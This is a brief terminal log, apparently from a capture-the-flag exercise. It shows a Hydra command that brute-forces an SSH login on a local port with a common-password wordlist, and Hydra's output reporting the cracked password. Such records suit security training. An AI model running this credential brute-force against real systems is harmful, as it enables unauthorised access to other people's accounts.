```
hydra -l pico -P ./500-worst-passwords.txt -s 2932 127.0.0.1 ssh
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-21 21:19:03
[DATA] 16 tasks, 1 server, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service ssh on port 2932
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[2932][ssh] host: 127.0.0.1   login: pico   password: corvette
```
